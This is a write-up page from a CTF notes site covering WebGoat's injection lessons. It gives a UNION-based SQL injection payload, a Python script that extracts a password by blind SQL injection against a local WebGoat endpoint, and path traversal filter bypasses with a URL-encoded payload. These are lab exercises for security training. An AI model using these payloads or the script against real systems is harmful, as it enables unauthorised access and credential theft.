Writeup-CTF
  • CTF events
    • DamCTF-2021
    • N1CTF 2021
    • WANNAGAME CHAMPIONSHIP2021
      • After end
    • DefCamp CTF 21-22
  • Root-me
    • SQL Injection - Filter bypass
    • GraphQL
    • JSON Web Token (JWT) - Public key
    • LDAP injection - Blind
    • Python - Blind SSTI Filters Bypass
    • SQL Injection - Filter bypass
    • SQL Truncation
    • Page 1
    • [Root-me]PHP - Unserialize overflow
  • WebGoat
    • Injection
    • XXE
    • Broken Authentication
      • JWT Token
      • Password reset
    • Sensitive Data Exposure
      • Insecure login
    • Broken Access Control
      • Insecure Direct Object References
    • Cross Site Scripting (XSS)
    • Cross site request forgery
      • Cross-Site Request Forgeries
      • Server-Side Request Forgery
    • Client site
      • Client site filtering
      • Bypass front-end restrictions
      • HTML tampering
    • Insecure Deserialization
    • Vulnerable Components
    • Challenges
      • Admin lost password
      • Without password
      • Without account
Powered by GitBook
On this page
  • SQL Injection Intro
  • SQL Injection Advance
  • 3/
  • 5/
  • SQL Injection Mitigation
  • Path traversal
  • 2/ Path traversal while uploading files
  • 3/ Path traversal while uploading files
  • 4/ Path traversal while uploading files
  • 5/ Retrieving other files with a path traversal
  1. WebGoat

Injection

SQL Injection Intro

SQL Injection Advance

3/

You can see the table userdata has 7 colums and the table user_system_data olnly has 4 colums, so the correct query to use union is:

' union select userid, user_name, password, cookie, null, null, null from user_system_data;--

5/ 

import requests
import string

url = 'http://localhost:8080/WebGoat/SqlInjectionAdvanced/challenge'
password=''
cookie = {"JSESSIONID":"sQ7Ew5BK_IUP7cCxfeu1oOviaQsNxE99PzLtVzg0"}
for i in range(1,23,1):
    for c in string.printable:
        r = requests.put(url,cookies=cookie,data={'username_reg':f"tom' AND substr(password,{i},1)='{c}'--",'email_reg':'tom@gmail.com','password_reg':'1','confirm_password_reg':'1'})
        #print(r.text)
        if 'already exists' in r.text:
            print(c)
            password+=c
print(password)

SQL Injection Mitigation

Path traversal

2/ Path traversal while uploading files

Change full name to ../test and update profile:

3/ Path traversal while uploading files

../ is removed. But you can use ..././, and when ../ is removed, you will have ../

4/ Path traversal while uploading files

Not same as above challenges. Path won't be not update when you update your full name. But you can change filename.

5/ Retrieving other files with a path traversal

When you click "show random cat picture", a cat picture will be shown. Modify request, you can see the parameter id in response, this values is picture name.

use this parameter with value is something like ../, you will receive illegible character.

url encode this value : you will see secret file.

Final payload: %2e%2e%2f%2e%2e%2fpath-traversal-secret

Don't use .jpg because it will be added automatically.

Previous[Root-me]PHP - Unserialize overflowNextXXE

Last updated 3 years ago